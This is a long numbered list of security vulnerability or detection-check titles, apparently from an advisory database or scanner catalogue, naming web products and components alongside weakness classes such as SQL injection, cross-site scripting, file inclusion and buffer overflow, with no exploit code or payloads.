[50918] WebEyes Guest Book yorum.asp SQL injection
[50915] DMXReady Registration Manager webblogmanager.mdb information disclosure
[50905] WebCal webCal3_detail.asp SQL injection
[50882] IBM WebSphere Application Server IsSecurityEnabled VMM flag information disclosure
[50861] Webboard view.php directory traversal
[50844] Ston3D WebPlayer and StandalonePlayer system.openURL() command execution
[50754] WebMember form.php script SQL injection
[50734] Webradev Download Protect GLOBALS[RootPath] file include
[50691] Novell GroupWise WebAccess unspecified cross-site scripting
[50689] Novell GroupWise WebAccess style expressions cross-site scripting
[50688] Novell GroupWise WebAccess session management mechanism unauthorized access
[50678] Web Conference Room Free unspecified cross-site scripting
[50672] Novell GroupWise WebAccess login page cross-site scripting
[50646] Realty Web-Base list_list.php SQL injection
[50643] IBM WebSphere Partner Gateway bcgarchive information disclosure
[50641] IBM WebSphere MQ client connection buffer overflow
[50640] KingSoft WebShield index.php cross-site scripting
[50610] OCS Inventory NG interface information disclosure
[50603] ClanWeb save.php security bypass
[50573] Microsoft Internet Information Services (IIS) WebDAV security bypass
[50558] Xerox WorkCentre Web server unspecified command execution
[50517] Apple Mac OS X HFS vfs sysctl interface denial of service
[50509] Zervit Webserver HTTP POST denial of service
[50477] Apple Safari WebKit SVGList buffer overflow
[50453] Sun GlassFish Enterprise Server Administration Interface cross-site scripting
[50450] Multiple HP products Embedded Web Server unauthorized access
[50409] TinyWebGallery init.php code execution
[50408] TinyWebGallery init.php file include
[50406] RTWebalbum index.php SQL injection
[50399] Realty Web-Base admin.php SQL injection
[50396] webSPELL language.php file include
[50395] webSPELL awards.php SQL injection
[50389] WebFileExplorer body.asp code execution
[50331] IceWarp Merak Mail Server WebMail cross-site scripting
[50328] IBM Tivoli Storage Manager (TSM) Web GUI buffer overflow
[50296] QuickTeam qte_web.php file include
[50237] DWebPro NTFS Alternate Data Stream information disclosure
[50236] DWebPro unspecified directory traversal
[50211] Quick 'n Easy Web Server directory traversal
[50193] CGI Rescue Web Mailer HTTP header injection
[50181] webSPELL file directory traversal
[50116] Red Hat Stronghold Secure Web Server unspecified cross-site scripting
[50112] Home Web Server GUI denial of service
[50089] Zervit Webserver unspecified directory traversal
[50079] WB News admin interface authentication bypass
[50077] WebPortal CMS indexk.php file include
[50076] WebPortal CMS index.php and help.php file include
[50067] Oracle WebLogic Server unspecified information disclosure variant 2
[50055] Oracle WebLogic Server component ODSI privilege escalation
[50054] Oracle WebLogic Server component WLS Web services read source code
[50053] Oracle WebLogic Server component WLS Web services privilege escalation
[50052] Oracle WebLogic Server component WLS Web services privilege escalation variant 2
[50051] Oracle WebLogic Server multiple Web plug-ins unspecified code execution, information disclosure, or denial of service
[50050] Oracle WebLogic Server multiple Web plug-ins unspecified code execution, information disclosure, or denial of service variant 2
[50049] Oracle Weblogic Server Jrockit privilege escalation
[49993] Zervit Webserver HTTP GET denial of service
[49967] webClassifieds index.php security bypass
[49966] EZ Webitor login.php SQL injection
[49962] Horde IMP and Horde Groupware Webmail Edition PGP keys spoofing
[49954] MiniWeb index.htm source disclosure
[49940] WebCollab unspecified cross-site request forgery
[49939] WebCollab tasks.php cross-site scripting
[49937] webSPELL BBCode cross-site scripting
[49935] Multiple W2B (Web to Business) products conf.inc information disclosure
[49925] Apache Geronimo Web Administrative Console cross-site request forgery
[49919] Zervit Webserver http_parse_hex() function buffer overflow
[49914] Miniweb URI buffer overflow
[49908] DivX Web Player STRF (Stream Format) chunk buffer overflow
[49896] FreeWebshop.org startmodules.inc.php file include
[49893] Novell Teaming web/guest/home cross-site scripting
[49885] aspWebCalendar calendar.mdb information disclosure
[49861] Yellow Duck Weblog check.php file include
[49821] The Puppet Master Webutil details command execution
[49820] The Puppet Master Webutil whois command execution
[49801] WebFileExplorer body.asp SQL injection
[49788] IBM BladeCenter management interface cross-site request forgery
[49741] WebFileExplorer db.mdb information disclosure
[49730] OpenGoo webpage[url] parameter cross-site scripting
[49683] Web Help Desk multiple form fields cross-site scripting
[49666] ContentKeeper Web cgi-bin/ck/mimencode command execution
[49665] ContentKeeper Web cgi-bin/ck/mimencode directory traversal
[49663] ContentKeeper Web benetool privilege escalation
[49648] Asbru Web Content Management login.asp cross-site scripting
[49647] Asbru Web Content Management page.asp SQL injection
[49602] Qt Web Browser HTML denial of service
[49597] XBMC websHomePageHandler() buffer overflow
[49591] SAP MaxDB webdbm cross-site scripting
[49564] Microsoft ISAServer and Microsoft Forefront TMG Web proxy TCP state denial of service
[49543] SAP GUI EAI WebViewer3D ActiveX control SaveViewToSessionFile() buffer overflow
[49534] IBM WebSphere Application Server XML digital signature security bypass
[49532] IBM WebSphere Application Server JAX-RPC WS-Security UsernameToken security bypass
[49531] IBM WebSphere Application Server interim fix insecure permissions
[49530] webEdition CMS index.php file include
[49528] Cisco ASA 5520 WebVPN cross-site scripting
[49499] IBM WebSphere Application Server administrative console forced logout session hijacking
[49476] Sun Java Web Start GIF buffer overflow
[49454] WeBid upldgallery.php file upload
[49427] Cisco IOS WebVPN and SSLVPN TCB memory leak denial of service
[49425] Cisco IOS WebVPN and SSLVPN HTTPS denial of service
[49395] WebCit module for Citadel embeddable_mini_calendar() format string
[49391] IBM WebSphere Application Server WS-Security session hijacking
[49370] ZyXEL G-570S Web server information disclosure
[49369] ZyXEL G-570S Web server security bypass
[49368] ZyXEL G-570S Web server denial of service
[49308] F5 BIG-IP management interface code execution
[49299] Multiple HP products Web server cross-site request forgery
[49298] Sitecore CMS Web service information disclosure
[49280] JustSystems Ichitaro Web PURAGUINBYUA code execution
[49259] Kim Websites login.php SQL injection
[49182] WeBid include_path file include
[49175] HighPortal web_search.aspx cross-site scripting
[49174] HighCMS web_search.aspx cross-site scripting
[49169] WEBjump! portfolio_genre.php and news_id.php SQL injection
[49164] IBM WebSphere Application Server sample applications cross-site scripting
[49163] IBM WebSphere Application Server administrative console cross-site scripting
[49138] Dotclear administration interface cross-site scripting
[49108] Easy Web Password .ewp file buffer overflow
[49106] Amoot Web Directory password SQL injection
[49085] IBM WebSphere Application Server Web-based applications security bypass
[49070] Easy File Sharing Web Server thumbnail.php directory traversal
[49017] Academic Webtools CMS page.php cross-site scripting
[48990] Fujitsu Jasmine2000 WebLink cross-site scripting
[48989] Fujitsu Jasmine2000 WebLink denial of service
[48988] Fujitsu Jasmine2000 WebLink buffer overflow
[48965] Cisco Unified MeetingPlace Web Conferencing E-mail Address cross-site scripting
[48937] SkyPortal WebLinks module multiple scripts authentication bypass
[48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing
[48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing
[48894] Dassault Systemes Web editor profile card information disclosure
[48892] IBM WebSphere Process Server cluster configuration file information disclosure
[48891] ZNC webadmin privilege escalation
[48888] Cisco Unified MeetingPlace Web Conferencing unauthorized access
[48886] IBM WebSphere Application Server for z/OS CSIv2 unspecified
[48832] cPanel WHM interface cross-site request forgery
[48818] Fujitsu Jasmine2000 WebLink HTTP response splitting
[48784] Moodle user editing interface privilege escalation
[48704] Galatolo WebManager result.php cross-site scripting
[48700] IBM WebSphere Application Server WSPolicy information disclosure
[48698] IBM WebSphere Application Server PMI WebSphere Portal denial of service
[48696] Den Dating Website Script searchmatch.php SQL injection
[48680] FAST ESP management interface cross-site scripting
[48659] GoAhead WebServer security handler information disclosure
[48658] GoAhead WebServer HTTP POST denial of service
[48657] GoAhead WebServer webs.c denial of service
[48656] GoAhead WebServer socket disconnect denial of service
[48655] GoAhead WebServer sockGen.c weak security
[48654] GoAhead WebServer websSafeUrl denial of service
[48653] GoAhead WebServer con, nul, clock$ or config$ denial of service
[48651] Agavi AgaviWebRouting::gen(null) cross-site scripting
[48648] TYPO3 user interface cross-site scripting
[48647] BlackBerry Application Web Loader ActiveX control unspecified buffer overflow
[48642] IBM WebSphere Message Broker JDBC error log information disclosure
[48637] WebFrame index.php file include
[48636] WebFrame index.php and menu.php classFiles file include
[48602] FotoWeb Login.fwx and Grid.fwx cross-site scripting
[48592] Trend Micro InterScan Web Security Suite JSP security bypass
[48588] HP OpenView Network Node Manager webappmon.exe and OpenView5.exe command execution
[48575] WebKit XMLHttpRequest.cpp information disclosure
[48566] AREVA e-terrahabitat WebFGServer privilege escalation
[48564] AREVA e-terrahabitat WebFGServer denial of service var2
[48563] AREVA e-terrahabitat WebFGServer denial of service var1
[48545] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface information disclosure
[48544] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface URL redirect
[48543] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface cross-site scripting
[48530] IBM WebSphere Partner Gateway RNIF signature verification bypass
[48529] IBM WebSphere MQ queue manager privilege escalation
[48528] IBM WebSphere Application Server JSP Windows information disclosure
[48527] IBM WebSphere Application Server installation log information disclosure
[48526] IBM WebSphere Application Server HTTP AF_UNIX sockets incorrect permissions
[48525] IBM WebSphere Application Server libibmaio.so library denial of service
[48524] IBM WebSphere Application Server PMI log file information disclosure
[48523] IBM WebSphere Application Server Web Server Plugin denial of service
[48522] IBM WebSphere Application Server File Transfer servlet information disclosure
[48481] WEBalbum photo.php SQL injection
[48477] Multiple Cisco products Web authentication denial of service
[48404] Novell GroupWise WebAccess HTTP POST information disclosure
[48393] Xerox WorkCentre Web server unspecified code execution
[48391] Novell GroupWise WebAccess unspecified cross-site request forgery
[48390] Novell GroupWise WebAccess email cross-site scripting
[48389] Novell GroupWise WebAccess webacc servlet cross-site scripting
[48380] IBM WebSphere Application Server administrative console file information disclosure
[48379] Profense Web Application Firewall proxy.html cross-site scripting
[48378] Profense Web Application Firewall ajax.html cross-site request forgery
[48337] WOW - Web On Windows ActiveX Control WriteIniFileString code execution
[48287] The Horde IMP Webmail Client smime.php, pgp.php, and message.php cross-site scripting
[48208] Web application forced browsing probe detected
[48204] Web Help Desk URL cross-site scripting
[48202] Web-Calendar Lite main.asp SQL injection
[48171] WebSVN listing.php information disclosure
[48168] WebSVN create_anchors code execution
[48161] Sun Java System Application Server WEB-INF and META-INF information disclosure
[48129] RoundCube Webmail HTML cross-site scripting
[48112] WowWee Rovio interface information disclosure
[48096] 53KF Web IM msg parameter cross-site scripting
[48091] Oracle WebLogic Server multiple reviewService samples cross-site scripting
[48054] DMXReady Blog Manager inc_webblogmanager.asp SQL injection
[48053] DMXReady Blog Manager inc_webblogmanager.asp cross-site scripting
[48005] Oracle WebLogic Server component JSP and servlet information disclosure
[48004] Oracle WebLogic Server component WLS Web services information disclosure
[48003] Oracle WebLogic Server WLS console unspecified cross-site scripting
[48002] Oracle WebLogic Server Portal administrative console cross-site scripting
[48001] Oracle WebLogic Server multiple Web plug-ins unspecified code execution
[47953] Cisco IronPort Encryption Appliance administration interface logout action cross-site request forgery
[47952] Cisco IronPort Encryption Appliance administration interface unspecified cross-site request forgery
[47936] Excel Viewer OCX ActiveX control OpenWebFile() file execution
[47930] PowerPoint Viewer OCX ActiveX control OpenWebFile() file execution
[47928] Office Viewer OCX ActiveX control OpenWebFile() file execution
[47927] Word Viewer OCX ActiveX control OpenWebFile() file execution
[47900] Git gitweb command execution
[47825] IBM WebSphere DataPower XML Security Gateway XS40 SSL denial of service
[47775] Fujitsu-Siemens WebTransactions application cross-site scripting
[47739] SolucionWeb main.php SQL injection
[47722] Webboard bview.asp SQL injection
[47654] SasCam Webcam Server ActiveX control buffer overflow
[47629] webClassifieds index.php SQL injection
[47617] Web Email Script index.php SQL injection
[47559] WEBERkommunal Facilities extension for TYPO3 unspecified SQL injection
[47550] Roundcube Webmail quota image denial of service
[47528] GIT gitweb privilege escalation
[47517] Extract Website download.php file include
[47495] Fujitsu-Siemens WebTransactions WBPublish.exe command execution
[47492] webcamXP URL directory traversal
[47481] Phpclanwebsite index.php cross-site scripting
[47480] Phpclanwebsite box.php and footer.php file include
[47478] Phpclanwebsite multiple scripts SQL injection
[47468] Free Jokes Website jokes.php SQL injection
[47364] Miniweb username parameter SQL injection
[47363] WebPhotoPro multiple scripts SQL injection
[47348] Discussion Web discussion.mdb information disclosure
[47321] CMS ISWEB index.php cross-site scripting
[47320] CMS ISWEB index.php SQL injection
[47301] Roundcube Webmail html2text.php code execution
[47288] IBM WebSphere Portal BasicAuthTAI security bypass
[47267] IBM WebSphere Application Server PerfServlet information disclosure
[47257] Sun Java Web Console BeginLogin.jsp phishing
[47256] Sun Java System Portal Server Web console information disclosure
[47221] Ruby WEBrick httputils.rb denial of service
[47211] Atlassian JIRA Webwork 1 security bypass
[47210] UN Webmaster Marketplace member.php SQL injection
[47200] IBM WebSphere Application Server Security component logoutExitPage open redirect
[47199] IBM WebSphere Application Server WebContainer HTTP response splitting
[47187] WebCAF index.php file include
[47186] WebCAF view.php file include
[47164] IBM Rational ClearQuest CQ Web cross-site scripting variant2
[47139] Linksys WVC54GC NetCamPlayerWeb11gv2 ActiveX control buffer overflow
[47136] IBM WebSphere Application Server Web Services Feature Pack security exposure
[47135] IBM WebSphere Application Server SIP information disclosure
[47134] IBM WebSphere Application Server JSP unspecified
[47058] Sun Java Web Start and Java Plug-in BasicService security bypass
[47057] Sun Java Web Start and Java Plug-in applet class security bypass
[47056] Sun Java Web Start and Java Plug-in cookies session hijacking
[47055] Sun Java Web Start SI_FILEDIR information disclosure
[47054] Sun Java Web Start jnlp file code execution
[47053] Sun Java Web Start file: protocol sandbox security bypass
[47020] WebGUI email attachments code execution
[46999] PHP JOBWEBSITE PRO forgot.php security bypass
[46998] PHP JOBWEBSITE PRO forgot.php SQL injection
[46997] PHP JOBWEBSITE PRO forgot.php cross-site scripting
[46992] IBM Rational ClearQuest CQ Web cross-site scripting variant1
[46953] Web Calendar Pro unspecified SQL injection
[46952] Web Calendar System calendar.asp SQL injection
[46951] Web Calendar System calendar.asp cross-site scripting
[46950] WEB Calendar calendar.asp SQL injection
[46949] WEB Calendar calendar.asp cross-site scripting
[46918] Active Websurvey SurveyTaker.asp SQL injection
[46915] Active Web Mail login.aspx SQL injection
[46910] eWebquiz start.asp SQL injection
[46905] Active Web Helpdesk default.aspx SQL injection
[46884] enVision Web console information disclosure
[46831] WebStudio eHotel index.php SQL injection
[46821] IBM Tivoli Access Manager for e-business WebSEAL denial of service
[46818] WebStudio CMS index.php SQL injection
[46817] Bandwebsite info.php cross-site scripting
[46816] Bandwebsite lyrics.php SQL injection
[46807] Apple iPhone Configuration Web Utility HTTP GET directory traversal
[46776] Foojan PHP Weblog index.php path disclosure
[46680] V-Webmail CONFIG[pear_dir] file include
[46679] V-Webmail pop3.php file include
[46678] Galatolo WebManager cookie security bypass
[46677] Galatolo WebManager index.php SQL injection
[46637] Bankoi Webhost Panel login.asp SQL injection
[46636] Web Host Directory db information disclosure
[46634] Web Host Directory adm and logged cookie parameter authentication bypass
[46600] Pi3Web ISAPI denial of service
[46597] Apple Safari WebKit information disclosure
[46592] Web Host Directory pwd parameter SQL injection
[46587] Web Hosting Directory admin/backup/db information disclosure
[46586] Web Hosting Directory cookie security bypass
[46523] Weblinks component for Joomla! title and description cross-site scripting
[46510] wims coqweb and account.sh symlink
[46456] Mini Web Calendar cal_default.php cross-site scripting
[46455] Mini Web Calendar cal_pdf.php file disclosure
[46370] Webbdomain WebShop detail.php cross-site scripting
[46369] Webbdomain WebShop detail.php SQL injection
[46362] Webbdomain Petition getin.php SQL injection
[46360] Webbdomain Polls getin.php SQL injection
[46359] Webbdomain Post Card getin.php panel SQL injection
[46358] Webbdomain Quiz getin.php SQL injection
[46357] Webbdomain WebShop getin.php SQL injection
[46298] phpWebSite links.php SQL injection
[46279] Webring category.php SQL injection
[46222] WebCards admin.php file upload
[46203] TYPOlight webCMS search.html cross-site scripting
[46193] WebCards admin.php SQL injection
[46164] WebSoccer liga.php SQL injection
[46161] AWBS (Advanced Webhost Billing System) anti-XSS input cross-site scripting
[46160] AWBS (Advanced Webhost Billing System) unspecified SQL injection
[46146] Blender BPY_interface.c command execution
[46137] WebGUI loadModule() function code execution
[46119] Sun Java Web Start showDocument command execution
[46061] Microsoft Outlook Web Access (OWA) redir.asp phishing
[46050] WebSVN rss.php directory traversal
[46048] WebSVN index.php cross-site scripting
[46002] IBM WebSphere Application Server CRL weak security
[45993] IBM WebSphere Application Server host header denial of service
[45955] Macrovision FLEXnet Connect MVSNCLientWebAgent61.WebAgent.1 ActiveX control (isusweb.dll) code execution
[45945] WebGUI password recovery feature weak security
[45944] WebGUI unspecified cross-site scripting
[45941] Hummingbird.XWebHostCtrl.1 ActiveX control (hclxweb.dll) buffer overflow
[45937] WEB//NEWS cookie security bypass
[45936] WEB//NEWS search.php SQL injection
[45918] myWebland myStats hits.php security bypass
[45917] myWebland myStats hits.php SQL injection
[45912] Oracle WebLogic Server webapps unauthorized access
[45911] Oracle Workshop for WebLogic NetUI pageflows unauthorized access
[45910] Oracle WebLogic admin applications privilege escalation
[45909] Oracle Workshop for WebLogic NetUI tags unauthorized access
[45908] Oracle WebLogic authorizer unauthorized access
[45875] PhpWebGallery create_function() code execution
[45874] PhpWebGallery event_list.php session hijacking
[45872] PhpWebGallery comments.php SQL injection
[45865] Webscene eCommerce productlist.php SQL injection
[45856] V-webmail login.php SQL injection
[45855] V-webmail redirect.php phishing
[45853] V-webmail login page path disclosure
[45849] Iltaweb Alisveris Sistemi urunler.asp SQL injection
[45844] Websense Reporter CreateDbInstall.log information disclosure
[45787] Apple Mac OS X Weblog weak security
[45782] Sun Java System Web Proxy Server FTP subsystem buffer overflow
[45709] H-Sphere webshell4 HTTP cross-site request forgery
[45707] H-Sphere webshell4 actions.php cross-site scripting
[45696] K9 Web Protection multiple authentication bypass
[45691] PHP Web Explorer main.php and edit.php file include
[45672] JMweb MP3 Music Audio Search and Download Script src file include
[45657] Website Directory index.php cross-site scripting
[45638] OLIB7 WebView infile parameter file include
[45614] H-Sphere WebShell actions.php cross-site request forgery
[45613] H-Sphere WebShell actions.php cross-site scripting
[45573] Adult Banner Exchange Website click.php SQL injection
[45500] Multiple WebBiscuits products header_setup.php file include
[45494] ParsaWeb id and txtSearch parameters SQL injection
[45469] Ultimate Webboard webboard.php SQL injection
[45449] webCMS Portal Edition id_doc SQL injection
[45448] webCMS Portal Edition id parameter SQL injection
[45447] webCMS Portal Edition patron parameter cross-site scripting
[45436] PromoteWeb MySQL go.php SQL injection
[45419] IBM Tivoli Netcool Webtop privilege escalation
[45416] CA Service Desk Web forms cross-site scripting
[45408] web-cp sendfile.php information disclosure
[45392] JETIK-WEB sayfa.php SQL injection
[45390] WebPortal CMS index.php code execution
[45380] Sofi WebGUI modstart.php file include
[45292] UT3 WebAdmin ImageServer.uc directory traversal
[45280] LooYu Web IM newVisitorChat.js and newCusChat.js cross-site scripting
[45252] H-Sphere webshell4 login.php cross-site scripting
[45243] Kantan WEB Server unspecified directory traversal
[45242] Kantan WEB Server unspecified cross-site scripting
[45241] HyperStop Web Host Directory admin/backup/db information disclosure
[45224] x10 Automatic MP3 Script web_root parameter file include
[45205] Beetel 220BX series DSL modems config interface information disclosure
[45185] Web directory script index.php SQL injection
[45151] Real Estate Website search.php SQL injection
[45148] Sports Clubs Web Panel id parameter SQL injection
[45123] IBM WebSphere Application Server Wsadmin information disclosure
[45122] IBM WebSphere Application Server Web Container security exposure
[45118] WebPortal CMS FCKEditor file upload
[45113] WebPortal CMS download.php SQL injection
[45062] Sports Clubs Web Panel index.php file include
[45061] PhpWebGallery isadmin.inc.php cross-site scripting
[45060] PhpWebGallery isadmin.inc.php and init.inc.php file include
[45024] Kim Websites upload.php file upload
[45009] Peachtree Accounting ActiveX control (PAWWeb11.ocx) code execution
[45008] Apple iPod touch WebKit code execution
[44961] D-Link DIR-100 Web proxy filter security bypass
[44959] Dating Website upload_banner.php file upload
[44886] Living Local Website listtest.php SQL injection
[44878] aspWebAlbum album.asp cross-site scripting
[44877] aspWebAlbum album.asp SQL injection
[44876] aspWebAlbum image file upload
[44822] WeBid eledicss.php file manipulation
[44820] WeBid cron.log information disclosure
[44817] WeBid item.php and admin panel SQL injection
[44804] WeBid config.php file upload
[44740] Mono Sys.Web module index.php CRLF header injection
[44693] Webboard admindel.php SQL injection
[44692] Webboard admindel.php security bypass
[44673] Civic Website Manager calendar control cross-site scripting
[44638] Web Directory Script listing_view.php SQL injection
[44602] Fujitsu Web-Based Admin View directory traversal
[44577] webEdition CMS we_objectID parameter SQL injection
[44574] Anzio Web Print Object (WePO) ActiveX component buffer overflow
[44557] Opera Web feed source information disclosure
[44534] Interleave Mobile Device Interface information disclosure
[44479] Horde Groupware Webmail multiple unspecified
[44454] Meet#Web root_path parameter file include
[44435] Oracle WebLogic Apache Connector buffer overflow
[44413] Sun Java System Web Proxy Server FTP denial of service
[44371] Ruby WEBrick::HTTPUtils.split_header_value() denial of service
[44281] BEA WebLogic Server and WebLogic Express LDAP denial of service
[44264] IBM WebSphere Portal unspecified authentication bypass
[44250] Cisco Webex Meeting Manager WebexUCFObject ActiveX control buffer overflow
[44124] Blue Coat K9 Web Protection HTTP version buffer overflow
[44123] Blue Coat K9 Web Protection Referer header buffer overflow
[44114] Sun N1 Service Provisioning System (SPS) Java System Web Server plugin unauthorized access
[44101] PhpWebGallery adviser mode information disclosure
[44100] Reviews Opinions Rating Posting Engine Web-Site PHP Script comments.php SQL injection
[44064] HIOX Web Browsers Statistics multiple scripts file include
[44055] Web Wiz Rich Text Editor RTE_popup_link.asp cross-site scripting
[44020] phpwebnews index.php SQL injection
[44012] Web Wiz Forum mode parameter cross-site scripting
[44011] Web Wiz Forums log_off_user.asp cross-site request forgery
[43978] Sun Java System Web Server unspecified cross-site scripting
[43977] Sun Java System Web Proxy Server unspecified cross-site scripting
[43976] Sun Java System Web Proxy Server View URL Database cross-site scripting
[43938] EZWebAlbum constants.inc security bypass
[43920] EZWebAlbum download.php file disclosure
[43885] Oracle WebLogic Server Apache Connector buffer overflow
[43879] LunarNight Laboratory WebProxy unspecified cross-site scripting
[43859] Spring Web MVC module information disclosure
[43858] Spring Web MVC module databinder weak security
[43857] Citrix XenServer XenAPI HTTP interfaces cross-site scripting
[43829] Oracle WebLogic Server JSP pages information disclosure
[43828] Oracle WebLogic Server ForeignJMS privilege escalation
[43827] Oracle WebLogic Server console and server log privilege escalation
[43826] Oracle WebLogic Server Console/WLST privilege escalation
[43825] Oracle WebLogic Server denial of service
[43824] Oracle WebLogic Server UDDI Explorer unauthorized access
[43823] Oracle WebLogic Server multiple Web plug-ins unauthorized access
[43781] Galatolo WebManager all.php cross-site scripting
[43776] Comdev Web Blogger arcmonth parameter SQL injection
[43751] Maian Weblog index.php security bypass
[43739] WebCMS index.php SQL injection
[43735] Apple Xcode WebObjects information disclosure
[43710] phpDatingClub website.php file include
[43709] 3Com HomeConnect Cable Modem External with USB Web server denial of service
[43684] phpwebnews index.php SQL injection
[43683] phpwebnews bukutamu.php SQL injection
[43672] Xerox CentreWare Web unspecified SQL injection
[43671] Xerox CentreWare Web unspecified cross-site scripting
[43668] Sun Java Web Start cache information disclosure
[43667] Sun Java Web Start file manipulation
[43666] Sun Java Web Start writeManifest method directory traversal
[43664] Sun Java Web Start GetVMArgsOption function buffer overflow
[43634] WebChamado eml parameter SQL injection
[43633] Academic Web Tools rss_getfile.php open redirect
[43596] webXell Editor upload_pictures.php file upload
[43595] CMS WebBlizzard index.php SQL injection
[43564] Wordtrans-web link_options parameter command execution
[43560] WEBalbum photo_add.php security bypass
[43555] Web Server Creator createdb.php file include
[43535] Brightcode Weblinks component for Joomla! index.php SQL injection
[43534] VanGogh Web CMS article_ID parameter SQL injection
[43469] Xe webtv component for Joomla! index.php SQL injection
[43425] Jokes Website joke.php SQL injection
[43405] Cheats Website item.php SQL injection
[43401] Tips Website tip.php SQL injection
[43399] Riddles Website riddle.php SQL injection
[43397] Drinks Website drink.php SQL injection
[43373] Keller Web Admin index.php file include
[43361] Webdevindo-CMS index.php SQL injection
[43344] WebGUI Collaboration System RSS feeds information disclosure
[43329] Microsoft Exchange Outlook Web Access HTML cross-site scripting
[43328] Microsoft Exchange Outlook Web Access email fields cross-site scripting
[43221] Apple Safari WebKit JavaScript array unspecified code execution
[43201] aspWebCalendar calendar_admin.asp file upload
[43194] Easy Webstore index.php SQL injection
[43179] Academic Web Tools index.php session hijacking
[43178] Academic Web Tools multiple cross-site scripting
[43177] Academic Web Tools rating.php SQL injection
[43175] Academic Web Tools download.php directory traversal
[43174] nweb2fax viewrq.php command execution
[43173] nweb2fax viewrq.php and comm.php directory traversal
[43156] WebCalendar send_reminders.php file include
[43115] Webmatic unspecified cross-site scripting
[43110] AWBS (Advanced Webhost Billing System) news.php SQL injection
[43105] Webmatic unspecified SQL injection
[43100] NITRO Web Gallery albums.php SQL injection
[43092] PHP JOBWEBSITE PRO JobSearch3.php SQL injection
[43069] WebChamado lista_anexos.php SQL injection
[43061] Xerox WorkCentre and WorkCentre Pro Web server cross-site scripting
[43060] WebChamado index.php SQL injection
[43059] Xerox WorkCentre Web services security bypass
[43058] Multiple Xerox Copier/Printer products Web server cross-site scripting
[43056] Kronos webTA com.threeis.webta.H710selProject and com.threeis.webta.H720editProjectInfo cross-site scripting
[42991] BackWeb Lite Install Runner ActiveX control (LiteInstActivator.dll) buffer overflow
[42975] Real Estate Web Site location.asp cross-site scripting
[42974] Real Estate Web Site location.asp SQL injection
[42934] Galatolo WebManager view.php SQL injection
[42923] Galatolo WebManager index.php file include
[42901] BEA WebLogic HTTP request smuggling
[42898] IBM WebSphere HTTP request smuggling
[42893] WEBalbum photo_add-c.php cross-site scripting
[42884] F5 FirePass webyfiers.php and index.php cross-site scripting
[42872] VMware VIX Application Programming Interface (API) multiple unspecified buffer overflow
[42842] BitKinex WebDAV and FTP clients directory traversal
[42822] IBM WebSphere Application Server SOAP security header exposure
[42813] SMEweb multiple scripts cross-site scripting
[42811] SMEweb catalog.php SQL injection
[42743] Kent Web Mart unspecified cross-site scripting
[42724] SAP Web Application Server sap/bc/gui/sap/its/webgui cross-site scripting
[42718] Apple Mac OS X Image Capture Web server directory traversal
[42669] EMC AlphaStor Command Line Interface buffer overflow
[42624] Sun Java System Web Server advanced search cross-site scripting
[42574] Weblosning result.php cross-site scripting
[42573] Weblosning index2.php SQL injection
[42555] Web Slider index.php SQL injection
[42553] IBM Lotus Domino servlet engine/Web container cross-site scripting
[42508] CMS WebManager-Pro index.php SQL injection
[42496] Webboard showQAnswer.asp SQL injection
[42475] Archangel Weblog index.php SQL injection
[42472] StanWeb.CMS default.asp SQL injection
[42468] Web Slider admin.php security bypass
[42438] Symantec Altiris Deployment Solution Agent user interface privilege escalation
[42433] Aruba Mobility Controller web UI cross-site scripting
[42385] Web Group Communication Center (WGCC) multiple scripts SQL injection
[42383] Web Group Communication Center (WGCC) profile.php cross-site scripting
[42306] cPanel WHM interface cross-site request forgery
[42305] cPanel WHM interface cross-site scripting
[42301] Microsoft OWA (Outlook Web Access) no-store information disclosure
[42287] Zarafa webaccess email header cross-site scripting
[42266] Sun Java System Application Server and Web Server JSP information disclosure
[42263] Sun Java System Web Server search module cross-site scripting
[42220] Blog Writer module for Miniweb historymonth parameter SQL injection
[42218] Bugzilla XML-RPC interface security bypass
[42217] WebMod dot information disclosure
[42215] WebMod parser.cpp buffer overflow
[42207] Maian Weblog index.php and header.php cross-site scripting
[42202] WebMod server.cpp buffer overflow
[42201] WebMod server.cpp directory traversal
[42184] RSA Authentication Agent IISWebAgentIF.dll security bypass
[42174] RSA Authentication Agent WebID/IISWebAgentIF.dll cross-site scripting
[42159] Novell GroupWise WebAccess .JPG cross-site scripting
[42141] eGroupWare Web server unspecified
[42124] Webhosting component for Joomla! catid parameter SQL injection
[42118] WebGUI data form unspecified
[42116] IBM WebSphere Application Server Java plugin privilege escalation
[42096] Web Host Directory Script host_id SQL injection
[41974] Horde Groupware Webmail addevent.php cross-site scripting
[41969] Akiva WebBoard profile page cross-site scripting
[41963] Web Calendar Pro one_day.php SQL injection
[41883] Grape Web Statistics functions.php file include
[41862] Apple Safari Webkit host name cross-site scripting
[41859] Apple Safari WebKit pcre_compile.cpp buffer overflow
[41824] Ruby WEBrick CGI information disclosure
[41819] mx_blogs module for mxBB functions_weblog.php file include
[41805] Nortel Communication Server Web application information disclosure
[41775] WinWebMail login denial of service
[41757] WorkSite Web Web TransferCtrl Class 8,2,1,4 (iManFile.cab) denial of service
[41710] SmarterMail Web Server SMWebSvr.exe denial of service
[41699] WorkSite Web TransferCtrl Class ActiveX control code execution
[41647] Borland CaliberRM StarTeam PGMWebHandler::parse_request() buffer overflow
[41620] Secure Computing Webwasher unspecified denial of service
[41617] Webform module for Drupal unspecified cross-site scripting
[41586] Squid Web Proxy Cache arrayShrink() denial of service
[41577] OTRS SOAP interface weak security
[41567] Airspan WiMAX ProST Advanced User Interface Pages default password
[41555] Neat weblog index.php SQL injection
[41532] SLMail Pro WebContainer.exe buffer overflow
[41531] SLMail Pro WebContainer.exe code execution
[41492] Aztech ADSL2/2+ 4 interface shell command execution
[41484] Cisco IOS VPND interface descriptor block (IDB) denial of service
[41439] FreeWebshop.org customer.php unauthorized access
[41430] Aeries Browser Interface (ABI) loginproc.asp and Login.asp cross-site scripting
[41429] Aeries Browser Interface (ABI) GradebookOptions.asp and loginproc.asp SQL injection
[41417] webSPELL board parameter cross-site scripting
[41407] HIS WebShop his-webshop.pl directory traversal
[41400] Webutil webutil.pl shell command execution
[41399] DotNetNuke web.config file weak security
[41334] Apple Safari WebCore document.domain property security bypass
[41331] Apple Safari WebCore Web Inspector security bypass
[41329] Apple Safari WebCore weak security
[41321] Apple Safari WebKit JavaScript regular expressions buffer overflow
[41320] Apple Safari WebKit component security bypass
[41313] Apple Mac OS X CFNetwork 502 Bad Gateway error Web site spoofing
[41250] VMware multiple products Virtual Machine Communication Interface (VMCI) denial of service
